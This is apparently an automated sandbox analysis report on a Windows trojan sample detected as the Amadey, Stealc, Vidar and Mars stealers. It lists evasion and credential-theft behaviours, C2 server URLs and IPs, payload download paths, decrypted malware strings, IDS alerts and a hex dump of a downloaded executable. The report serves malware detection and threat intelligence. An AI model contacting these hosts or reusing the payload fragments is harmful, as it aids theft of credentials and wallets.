Windows Analysis Report
Wf9qnVcbi8.exe

Overview

General Information

Sample name: Wf9qnVcbi8.exe
renamed because original name is a hash value
Original sample name: 58972b34ce77f8d7bbaa3f5b5344db20.exe
Analysis ID: 1465786
MD5: 58972b34ce77f8d7bbaa3f5b5344db20
SHA1: a3dc18dbe5abb0fffe62427366ff5f52e16a28a7
SHA256: 048802231eccee2a6db341d1a4e92b2b1671eb287da215ad35fcf2bad70fa700
Tags: 32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Wf9qnVcbi8.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpf Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllnH Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe% Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe; Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpUd Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php. Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpGd Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exephprefoxox Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll-f Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeVs-= Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpr Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllrf Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll#ab= Avira URL Cloud: Label: malware
Source: http://85.28.47.4/wd Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpZ Avira URL Cloud: Label: malware
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:HK Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpa Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpDTo Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpp Avira URL Cloud: Label: malware
Source: http://85.28.47.4/c9 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 13.2.528307a0ac.exe.550000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: Wf9qnVcbi8.exe.1864.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7436.12.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.82/Hun4Ko/index.phpP Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 17% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php2 Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpV Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php. Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Virustotal: Detection: 22% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php: Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 23% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 23% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: Wf9qnVcbi8.exe Virustotal: Detection: 45% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Wf9qnVcbi8.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetProcAddress
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LoadLibraryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcatA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: OpenEventA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateEventA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CloseHandle
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Sleep
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserDefaultLangID
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualAllocExNuma
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemInfo
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HeapAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetComputerNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcpyA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetProcessHeap
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetCurrentProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrlenA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ExitProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SystemTimeToFileTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: advapi32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: gdi32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: user32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: crypt32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ntdll.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateDCA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetDeviceCaps
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ReleaseDC
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CryptStringToBinaryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: sscanf
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VMwareVMware
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HAL9TH
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: JohnDoe
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DISPLAY
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: %hu/%hu/%hu
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: http://85.28.47.4
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: /920475a59bac849d.php
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: /69934896f997d5bb/
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: jony
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileAttributesA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalLock
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HeapFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileSize
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalSize
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: IsWow64Process
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Process32Next
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLocalTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FreeLibrary
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetTimeZoneInformation
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemPowerStatus
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetVolumeInformationA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Process32First
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLocaleInfoA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetModuleFileNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DeleteFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindNextFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LocalFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindClose
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LocalAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileSizeEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ReadFile
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SetFilePointer
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: WriteFile
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindFirstFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CopyFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualProtect
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLastError
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcpynA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: MultiByteToWideChar
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: WideCharToMultiByte
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: OpenProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: TerminateProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetCurrentProcessId
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: gdiplus.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ole32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: bcrypt.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: wininet.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: shlwapi.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: shell32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: psapi.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: rstrtmgr.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SelectObject
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: BitBlt
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C556C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C556C80
Uses 32bit PE files
Source: Wf9qnVcbi8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.5:49704
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:11:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
